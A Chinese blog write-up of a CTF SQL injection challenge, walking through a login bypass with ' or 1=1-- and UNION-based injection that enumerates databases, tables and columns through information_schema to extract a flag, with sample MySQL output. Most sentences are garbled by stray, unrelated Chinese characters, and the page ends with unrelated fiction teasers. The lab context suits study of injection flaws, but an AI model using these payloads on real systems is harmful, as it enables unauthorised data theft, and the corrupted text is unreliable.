簡單sql注入|使用語句

這道題是一道get注入題

語句的使用

假如我們有一個users表俄周,里面有兩個字段username和password峦朗。在我們的java代碼中我們初學者都習慣用sql拼接的方式進行用戶驗證波势。比如:"select id from users where username = '"+username +"' and password = '" + password +"'" 這里的username和password都是我們存取從web表單獲得的數據。下面我們來看一下一種簡單的注入凛忿,如果我們在表單中username的輸入框中輸入' or 1=1-- 蕉汪,password的表單中隨便輸入一些東西者疤,假如這里輸入123.此時我們所要執(zhí)行的sql語句就變成了select id from users where username = '' or 1=1-- and password = '123',我們來看一下這個sql糯累,因為1=1是true,后面 and password = '123'被注釋掉了胖秒。

本段轉自sql注入原理阎肝。
查詢知道當前數據庫是mysql,其中中有select database();語句沛硅,可以查詢當前數據庫名稱鸟整。
Union是聯合查找篮条。
通過我自己的mysql實驗得出

mysql> select * from info union select 1,2,3,4,5,6,7,1,2,4,database()
+---+---+---+---+---+---+---+---+---+---+---+------------+
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 1 | 2 | 3 | 4 | database() |
+---+---+---+---+---+---+---+---+---+---+---+------------+
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 1 | 2 | 3 | 4 | student    |
+---+---+---+---+---+---+---+---+---+---+---+------------+

需要輸入正確的列數才能獲取結果赴恨。
由此構造1 ' union select 1,2,3,database()#提交伦连,得出庫名pentesterlab额港,這里#是注釋掉后面的語句移斩。
接下來爆表名向瓷,select from where是一個語句,可以用來查詢表中某一列的值舰涌,結果可以是返回多行猖任,用我自己的mysql試驗之后發(fā)現是沒有問題是。
在mysql中有一個information_schema瓷耙,是mysql自帶的數據庫超升,庫內有一個TABLE表,表中存放了如下兩個關鍵的數據


第一個是數據庫的庫名室琢,第二個是表名。但這個庫和我們所在的庫不是同一個庫落追,關于mysql的跨庫查詢是可以直接用點路徑
select * from info union select 1,2,3,4,5,6,7,1,2,3,4,table_name from information_schema.tables where table_schema='student';
再次拿自己的mysql進行實驗盈滴,發(fā)現使用這句語句時可以訪問到查詢的數據庫內擁有的表。(庫內搞了太多字段了寫的蛋疼轿钠。巢钓。。)

mysql> select 1,2,3,4,5,6,7,1,2,3,4,table_name from information_schema.tables where table_schema='student';
+---+---+---+---+---+---+---+---+---+---+---+------------+
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 1 | 2 | 3 | 4 | TABLE_NAME |
+---+---+---+---+---+---+---+---+---+---+---+------------+
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 1 | 2 | 3 | 4 | info       |
+---+---+---+---+---+---+---+---+---+---+---+------------+

所以構造語句
1 ' union select 1,2,3,table_name from information_schema.tables where table_schema='pentesterlab'#


ctf比賽中的目的是獲取flag疗垛,而這里有一個flag表症汹,所以接下來的行動就是爆表了。贷腕。
同樣是information_schema庫背镇,庫內有COLUMNS這個表:主要的結構如下

以我的數據庫為例,hhhm是我的mysql中的其中一個庫名泽裳,blog_article_title是我的庫內的一個表瞒斩。查看navicat可以知道我的表內有這些,與上面的相對應涮总。最后一個column_name就是我們要爆的表的字段名胸囱。

所以依舊構造語句

mysql> select 1,2,3,4,5,6,7,1,2,3,4,column_name from information_schema.columns where table_schema='student';
+---+---+---+---+---+---+---+---+---+---+---+-------------+
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 1 | 2 | 3 | 4 | COLUMN_NAME |
+---+---+---+---+---+---+---+---+---+---+---+-------------+
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 1 | 2 | 3 | 4 | 學號        |
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 1 | 2 | 3 | 4 | 姓名        |
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 1 | 2 | 3 | 4 | 性別        |
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 1 | 2 | 3 | 4 | 生日        |
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 1 | 2 | 3 | 4 | 學籍        |
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 1 | 2 | 3 | 4 | 學院        |
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 1 | 2 | 3 | 4 | 專業(yè)        |
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 1 | 2 | 3 | 4 | 班級        |
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 1 | 2 | 3 | 4 | 校區(qū)        |
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 1 | 2 | 3 | 4 | 畢業(yè)高中    |
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 1 | 2 | 3 | 4 | 所在地      |
| 1 | 2 | 3 | 4 | 5 | 6 | 7 | 1 | 2 | 3 | 4 | 手機號      |
+---+---+---+---+---+---+---+---+---+---+---+-------------

先試自己,發(fā)現確實如此瀑梗!
1' union select 1,2,3,column_name from information_schema.columns where table_name='flag'#


該flag的表內有id和flag兩個字段烹笔,有四行裳扯。最后就很容易了:
1' union select 1,2,3,flag from flag#

得出答案

關于information_schema的得知

參考自點擊查看

歡迎訪問我的博客www.redmango.top

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯系作者
  • 序言:七十年代末谤职,一起剝皮案震驚了整個濱河市嚎朽,隨后出現的幾起案子,更是在濱河造成了極大的恐慌柬帕,老刑警劉巖哟忍,帶你破解...
    沈念sama閱讀 219,589評論 6 508
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現場離奇詭異陷寝,居然都是意外死亡锅很,警方通過查閱死者的電腦和手機,發(fā)現死者居然都...
    沈念sama閱讀 93,615評論 3 396
  • 文/潘曉璐 我一進店門凤跑,熙熙樓的掌柜王于貴愁眉苦臉地迎上來爆安,“玉大人,你說我怎么就攤上這事仔引∪硬郑” “怎么了?”我有些...
    開封第一講書人閱讀 165,933評論 0 356
  • 文/不壞的土叔 我叫張陵咖耘,是天一觀的道長翘簇。 經常有香客問我,道長儿倒,這世上最難降的妖魔是什么版保? 我笑而不...
    開封第一講書人閱讀 58,976評論 1 295
  • 正文 為了忘掉前任,我火速辦了婚禮夫否,結果婚禮上彻犁,老公的妹妹穿的比我還像新娘。我一直安慰自己凰慈,他們只是感情好汞幢,可當我...
    茶點故事閱讀 67,999評論 6 393
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著微谓,像睡著了一般森篷。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上堰酿,一...
    開封第一講書人閱讀 51,775評論 1 307
  • 那天疾宏,我揣著相機與錄音张足,去河邊找鬼触创。 笑死,一個胖子當著我的面吹牛为牍,可吹牛的內容都是我干的哼绑。 我是一名探鬼主播岩馍,決...
    沈念sama閱讀 40,474評論 3 420
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼抖韩!你這毒婦竟也來了蛀恩?” 一聲冷哼從身側響起,我...
    開封第一講書人閱讀 39,359評論 0 276
  • 序言:老撾萬榮一對情侶失蹤茂浮,失蹤者是張志新(化名)和其女友劉穎双谆,沒想到半個月后,有當地人在樹林里發(fā)現了一具尸體席揽,經...
    沈念sama閱讀 45,854評論 1 317
  • 正文 獨居荒郊野嶺守林人離奇死亡顽馋,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 38,007評論 3 338
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現自己被綠了幌羞。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片寸谜。...
    茶點故事閱讀 40,146評論 1 351
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖属桦,靈堂內的尸體忽然破棺而出熊痴,到底是詐尸還是另有隱情,我是刑警寧澤聂宾,帶...
    沈念sama閱讀 35,826評論 5 346
  • 正文 年R本政府宣布果善,位于F島的核電站,受9級特大地震影響系谐,放射性物質發(fā)生泄漏岭埠。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 41,484評論 3 331
  • 文/蒙蒙 一蔚鸥、第九天 我趴在偏房一處隱蔽的房頂上張望惜论。 院中可真熱鬧,春花似錦止喷、人聲如沸馆类。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,029評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽乾巧。三九已至,卻和暖如春预愤,著一層夾襖步出監(jiān)牢的瞬間沟于,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 33,153評論 1 272
  • 我被黑心中介騙來泰國打工植康, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留旷太,地道東北人。 一個月前我還...
    沈念sama閱讀 48,420評論 3 373
  • 正文 我出身青樓,卻偏偏與公主長得像供璧,于是被迫代替她去往敵國和親存崖。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 45,107評論 2 356